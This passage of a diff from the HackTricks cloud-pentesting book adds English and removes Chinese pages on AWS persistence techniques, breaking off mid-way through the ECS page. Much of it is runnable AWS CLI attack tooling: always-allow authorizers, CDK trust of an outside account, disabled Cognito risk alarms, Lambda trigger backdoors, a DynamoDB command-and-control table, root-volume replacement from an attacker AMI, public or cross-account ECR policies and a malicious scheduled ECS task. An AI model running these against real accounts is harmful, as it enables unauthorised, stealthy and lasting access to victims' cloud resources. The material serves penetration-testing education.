"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
}
```
该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以假设该角色。然而,它并没有指明哪个服务账户可以假设它,这意味着**任何具有Web身份令牌的服务账户**都将**能够假设**该角色。
为了指定**哪个服务账户应该能够假设该角色,**需要指定一个**条件**,其中**指定服务账户名称**,例如:
This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
## 参考
## References
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,16 +2,20 @@
{{#include ../../banners/hacktricks-training.md}}
这些是您在每个要审计的 AWS 账户上需要的权限,以便能够运行所有提议的 AWS 审计工具:
These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
- 默认策略 **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
- 要运行 [aws_iam_review](https://github.com/carlospolop/aws_iam_review),您还需要以下权限:
- **access-analyzer:List\***
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
- 如果客户为您生成分析器,则为可选,但通常只需请求此权限更容易)
- **access-analyzer:DeleteAnalyzer**
- 如果客户为您删除分析器,则为可选,但通常只需请求此权限更容易)
- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- **access-analyzer:List\***
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
- Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- **access-analyzer:DeleteAnalyzer**
- Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,3 +1,5 @@
# AWS - 持久性
# AWS - Persistence
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,36 @@
# AWS - API Gateway Persistence
{{#include ../../../banners/hacktricks-training.md}}
## API Gateway
For more information go to:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
### Resource Policy
Modify the resource policy of the API gateway(s) to grant yourself access to them
### Modify Lambda Authorizers
Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
Or just remove the use of the authorizer.
### IAM Permissions
If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
Or just remove the use of the authorizer.
### API Keys
If API keys are used, you could leak them to maintain persistence or even create new ones.\
Or just remove the use of API keys.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,54 +0,0 @@
# AWS - API Gateway Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## API Gateway
更多信息请见:
{{#ref}}
../../aws-services/aws-api-gateway-enum.md
{{#endref}}
### 资源策略
修改 API gateway(s) 的资源策略,以授予自己对它们的访问权限
### 修改 Lambda Authorizers
修改 lambda authorizers 的代码,以授予自己对所有 endpoints 的访问权限。\ 或者直接移除 authorizer 的使用。
如果你拥有控制平面权限来 **create/update an authorizer** (REST API: `aws apigateway update-authorizer`, HTTP API: `aws apigatewayv2 update-authorizer`),你也可以 **repoint the authorizer to a Lambda that always allows**
REST APIs更改通常需要部署
```bash
REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"
```
HTTP APIs / `apigatewayv2` (通常立即生效):
```bash
REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
```
### IAM 权限
如果一个资源使用 IAM authorizer你可以通过修改 IAM 权限来为自己授予访问权限。\
或者直接移除 authorizer 的使用。
### API Keys
如果使用 API keys你可以 leak 它们以维持持久性,甚至创建新的 API keys。\
或者直接移除 API keys 的使用。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,25 @@
# AWS - Cloudformation Persistence
{{#include ../../../banners/hacktricks-training.md}}
## CloudFormation
For more information, access:
{{#ref}}
../aws-services/aws-cloudformation-and-codestar-enum.md
{{#endref}}
### CDK Bootstrap Stack
The AWS CDK deploys a CFN stack called `CDKToolkit`. This stack supports a parameter `TrustedAccounts` which allow external accounts to deploy CDK projects into the victim account. An attacker can abuse this to grant themselves indefinite access to the victim account, either by using the AWS cli to redeploy the stack with parameters, or the AWS CDK cli.
```bash
# CDK
cdk bootstrap --trust 1234567890
# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,23 +0,0 @@
# AWS - Cloudformation 持久化
{{#include ../../../../banners/hacktricks-training.md}}
## CloudFormation
更多信息请访问:
{{#ref}}
../../aws-services/aws-cloudformation-and-codestar-enum.md
{{#endref}}
### CDK Bootstrap Stack
AWS CDK 会部署一个名为 `CDKToolkit` 的 CFN 堆栈。该堆栈支持一个参数 `TrustedAccounts`,允许外部账户将 CDK 项目部署到受害者账户中。攻击者可以滥用这一点,通过使用 AWS cli 带参数重新部署该堆栈,或使用 AWS CDK cli为自己获取对受害者账户的无限期访问权限。
```bash
# CDK
cdk bootstrap --trust 1234567890
# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,46 @@
# AWS - Cognito Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Cognito
For more information, access:
{{#ref}}
../aws-services/aws-cognito-enum/
{{#endref}}
### User persistence
Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
- **Adding a User Pool** controlled by the user to an Identity Pool
- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- Or to an **authenticated Identity Pool** if the attacker can login
- Or **improve the permissions** of the given roles
- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
Check how to do these actions in
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
{{#endref}}
### `cognito-idp:SetRiskConfiguration`
An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
```bash
aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
By default this is disabled:
<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,40 +0,0 @@
# AWS - Cognito Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Cognito
欲了解更多信息,请访问:
{{#ref}}
../../aws-services/aws-cognito-enum/
{{#endref}}
### User persistence
Cognito 是一项服务,用于向未认证和已认证的用户授予 roles 并管理用户目录。可以通过修改多种配置来保持某种持久性,例如:
- **添加一个由用户控制的 User Pool** 到 Identity Pool
- 给予一个 **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- 或者给 **authenticated Identity Pool**(如果攻击者能登录)
- 或者 **提升已授予 roles 的权限**
- **Create, verify & privesc** 通过受控属性的用户或在 **User Pool** 中创建的新用户
- **Allowing external Identity Providers** 登录到 User Pool 或 Identity Pool
请查看下面的文档了解如何执行这些操作:
{{#ref}}
../../aws-privilege-escalation/aws-cognito-privesc/README.md
{{#endref}}
### `cognito-idp:SetRiskConfiguration`
拥有此权限的攻击者可以修改风险配置,从而能够以 Cognito 用户身份登录,**而不会触发告警**。 [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) 查看所有选项:
```bash
aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
默认情况下禁用:
<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,67 @@
# AWS - DynamoDB Persistence
{{#include ../../../banners/hacktricks-training.md}}
### DynamoDB
For more information access:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
{{#endref}}
### DynamoDB Triggers with Lambda Backdoor
Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
```bash
# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>
```
To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
### DynamoDB as a C2 Channel
An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
```
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,59 +0,0 @@
# AWS - DynamoDB Persistence
{{#include ../../../../banners/hacktricks-training.md}}
### DynamoDB
有关更多信息,请访问:
{{#ref}}
../../aws-services/aws-dynamodb-enum.md
{{#endref}}
### DynamoDB Triggers with Lambda Backdoor
使用 DynamoDB triggers攻击者可以通过将恶意 Lambda function 与 table 关联来创建一个 **stealthy backdoor**。当添加、修改或删除某个 item 时Lambda function 会被触发,从而使攻击者能够在 AWS 账户中执行任意代码。
```bash
# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>
```
为了保持 persistence攻击者可以在 DynamoDB 表中创建或修改 items从而触发恶意的 Lambda 函数。这允许攻击者在 AWS 账户内执行代码,而无需与 Lambda 函数直接交互。
### DynamoDB as a C2 Channel
攻击者可以将 DynamoDB 表用作 **command and control (C2) channel**,通过创建包含命令的 items并使用被入侵的实例或 Lambda 函数来获取并执行这些命令。
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
```
被攻陷的实例或 Lambda functions 可以定期检查 C2 表以获取新命令、执行这些命令,并可选择将结果回报到该表。这允许攻击者对被攻陷的资源保持持久性和控制。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,58 @@
# AWS - EC2 Persistence
{{#include ../../../banners/hacktricks-training.md}}
## EC2
For more information check:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
### Security Group Connection Tracking Persistence
If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
### EC2 Lifecycle Manager
This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
### Scheduled Instances
It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
### Spot Fleet Request
Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
### Backdoor Instances
An attacker could get access to the instances and backdoor them:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
- Backdooring the **User Data**
### **Backdoor Launch Configuration**
- Backdoor the used AMI
- Backdoor the User Data
- Backdoor the Key Pair
### VPN
Create a VPN so the attacker will be able to connect directly through i to the VPC.
### VPC Peering
Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,61 +0,0 @@
# AWS - EC2 Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## EC2
更多信息请参见:
{{#ref}}
../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
### Security Group Connection Tracking Persistence
如果防御方发现某个 **EC2 instance was compromised**,他们很可能会尝试**隔离**该机器的**network**。他们可以通过显式的 **Deny NACL**(但 NACLs 会影响整个子网),或者**更改 the security group**使其不允许**任何 kind of inbound or outbound** 流量来做到这一点。
如果攻击者从该机器发起了一个 **reverse shell originated from the machine**,即使修改了 SG 以不允许 inbound 或 outbound 流量,连接也不会因为 [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html) 而被终止。
### EC2 Lifecycle Manager
该服务允许**schedule**去**创建 AMIs and snapshots**,甚至**share them with other accounts**。攻击者可以配置对所有镜像或所有卷**every week**生成 AMIs 或 snapshots并**share them with his account**。
### Scheduled Instances
可以将 instances 安排为每天、每周甚至每月运行。攻击者可以运行一台具有高权限或有价值访问权限的机器,从而能够访问目标资源。
### Spot Fleet Request
Spot instances 比常规实例**cheaper**。攻击者可以发起一个**small spot fleet request for 5 year**(例如),带有**automatic IP** 分配和一个 **user data**,当 spot instance start 时向攻击者发送 **IP address**,并附带一个 **high privileged IAM role**
### Backdoor Instances
攻击者可获得 instances 访问权限并对其进行 backdoor
- 例如使用传统的 **rootkit**
- 添加新的 **public SSH key**(查看 [EC2 privesc options](../../aws-privilege-escalation/aws-ec2-privesc/README.md)
-**User Data** 中植入 backdoor
### **Backdoor Launch Configuration**
- 对所使用的 AMI 进行 backdoor
- 对 User Data 进行 backdoor
- 对 Key Pair 进行 backdoor
### EC2 ReplaceRootVolume Task (Stealth Backdoor)
使用 `CreateReplaceRootVolumeTask`,将运行中实例的 root EBS volume 替换为由攻击者控制的 AMI 或 snapshot 构建的卷。实例保留其 ENIs、IPs 和 role实际上会启动到恶意代码但外观上保持不变。
{{#ref}}
../aws-ec2-replace-root-volume-persistence/README.md
{{#endref}}
### VPN
创建一个 VPN使攻击者能够直接通过它连接到 VPC。
### VPC Peering
在受害者 VPC 与攻击者 VPC 之间创建 peering connection以便他能够访问受害者 VPC。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,75 +0,0 @@
# AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)
{{#include ../../../../banners/hacktricks-training.md}}
滥用 **ec2:CreateReplaceRootVolumeTask** 将正在运行的实例的根 EBS 卷替换为从攻击者控制的 AMI 或快照恢复的卷。实例会自动重启,并在保留 ENIs、私有/公共 IPs、附加的非根卷以及实例元数据/IAM 角色的同时使用攻击者控制的根文件系统继续运行。
## 要求
- 目标实例基于 EBS 并在相同区域运行。
- 兼容的 AMI 或快照:与目标实例具有相同的架构/虚拟化/启动模式(以及产品代码,如有)。
## 预检查
```bash
REGION=us-east-1
INSTANCE_ID=<victim instance>
# Ensure EBS-backed
aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].RootDeviceType' --output text
# Capture current network and root volume
ROOT_DEV=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].RootDeviceName' --output text)
ORIG_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
PRI_IP=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].PrivateIpAddress' --output text)
ENI_ID=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].NetworkInterfaces[0].NetworkInterfaceId' --output text)
```
## 从 AMI 替换 root首选
```bash
IMAGE_ID=<attacker-controlled compatible AMI>
# Start task
TASK_ID=$(aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --image-id $IMAGE_ID --query 'ReplaceRootVolumeTaskId' --output text)
# Poll until state == succeeded
while true; do
STATE=$(aws ec2 describe-replace-root-volume-tasks --region $REGION --replace-root-volume-task-ids $TASK_ID --query 'ReplaceRootVolumeTasks[0].TaskState' --output text)
echo "$STATE"; [ "$STATE" = "succeeded" ] && break; [ "$STATE" = "failed" ] && exit 1; sleep 10;
done
```
使用 snapshot 的替代方法:
```bash
SNAPSHOT_ID=<snapshot with bootable root FS compatible with the instance>
aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAPSHOT_ID
```
## 证据 / 验证
```bash
# Instance auto-reboots; network identity is preserved
NEW_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
# Compare before vs after
printf "ENI:%s IP:%s
ORIG_VOL:%s
NEW_VOL:%s
" "$ENI_ID" "$PRI_IP" "$ORIG_VOL" "$NEW_VOL"
# (Optional) Inspect task details and console output
aws ec2 describe-replace-root-volume-tasks --region $REGION --replace-root-volume-task-ids $TASK_ID --output json
aws ec2 get-console-output --region $REGION --instance-id $INSTANCE_ID --latest --output text
```
Expected: ENI_ID and PRI_IP remain the same; the root volume ID changes from $ORIG_VOL to $NEW_VOL. The system boots with the filesystem from the attacker-controlled AMI/snapshot.
## Notes
- API 不要求你手动停止实例EC2 会协调重启。
- 默认情况下,被替换的(旧)根 EBS 卷会被分离并保留在账号中 (DeleteReplacedRootVolume=false)。这可用于回滚,否则必须删除以避免产生费用。
## Rollback / Cleanup
```bash
# If the original root volume still exists (e.g., $ORIG_VOL is in state "available"),
# you can create a snapshot and replace again from it:
SNAP=$(aws ec2 create-snapshot --region $REGION --volume-id $ORIG_VOL --description "Rollback snapshot for $INSTANCE_ID" --query SnapshotId --output text)
aws ec2 wait snapshot-completed --region $REGION --snapshot-ids $SNAP
aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAP
# Or simply delete the detached old root volume if not needed:
aws ec2 delete-volume --region $REGION --volume-id $ORIG_VOL
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,101 @@
# AWS - ECR Persistence
{{#include ../../../banners/hacktricks-training.md}}
## ECR
For more information check:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
### Hidden Docker Image with Malicious Code
An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
### Repository Policy
Add a policy to a single repository granting yourself (or everybody) access to a repository:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
> [!WARNING]
> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
### Registry Policy & Cross-account Replication
It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
<figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
First, you need to give the external account access over the registry with a **registry policy** like:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
Then apply the replication config:
```bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,145 +0,0 @@
# AWS - ECR 持久化
{{#include ../../../../banners/hacktricks-training.md}}
## ECR
有关更多信息,请查看:
{{#ref}}
../../aws-services/aws-ecr-enum.md
{{#endref}}
### 隐藏的 Docker 镜像(包含恶意 code
攻击者可以**上传一个包含恶意 code 的 Docker 镜像**到 ECR 仓库,并利用它在目标 AWS 账户中维持持久性。攻击者随后可以以隐蔽方式将该恶意镜像部署到账户内的多个服务,例如 Amazon ECS 或 EKS。
### 仓库策略
向单个仓库添加一个策略,授权你自己(或任何人)访问该仓库:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
> [!WARNING]
> 注意 ECR 要求用户拥有 **权限** 去通过 IAM 策略调用 **`ecr:GetAuthorizationToken`** API**在他们能够认证之前**,才能对注册表进行认证并从任何 Amazon ECR 存储库推送或拉取任何镜像。
### 注册表策略 & 跨账户复制
可以通过配置跨账户复制自动在外部账户中复制注册表,你需要 **指定要复制注册表的外部账户**
<figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
首先,你需要使用如下 **注册表策略** 授予外部账户对该注册表的访问权限:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
然后应用复制配置:
```bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
```
### Repository Creation Templates为未来仓库设置前缀后门
滥用 ECR Repository Creation Templates自动为 ECR 在受控前缀下自动创建的任何仓库植入后门(例如通过 Pull-Through Cache 或 Create-on-Push。这可以在不修改现有仓库的情况下持久地对未来仓库授予未授权访问。
- 所需权限ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy由模板使用iam:PassRole如果模板附加了自定义角色
- 影响:在目标前缀下创建的任何新仓库会自动继承攻击者控制的仓库策略(例如跨账户读/写)、标签可变性和扫描默认设置。
<details>
<summary>在选定前缀下为未来 PTC 创建的仓库植入后门</summary>
```bash
# Region
REGION=us-east-1
# 1) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BackdoorRW",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer",
"ecr:InitiateLayerUpload",
"ecr:UploadLayerPart",
"ecr:CompleteLayerUpload",
"ecr:PutImage"
]
}
]
}
JSON
# 2) Create a Repository Creation Template for prefix "ptc2" applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template --region $REGION --prefix ptc2 --applied-for PULL_THROUGH_CACHE --image-tag-mutability MUTABLE --repository-policy file:///tmp/repo_backdoor_policy.json
# 3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
# This example caches from Amazon ECR Public namespace "nginx"
aws ecr create-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc2 --upstream-registry ecr-public --upstream-registry-url public.ecr.aws --upstream-repository-prefix nginx
# 4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest
# 5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy --region $REGION --repository-name ptc2/nginx --query policyText --output text | jq .
```
</details>
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,103 @@
# AWS - ECS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## ECS
For more information check:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
### Hidden Periodic ECS Task
> [!NOTE]
> TODO: Test
An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
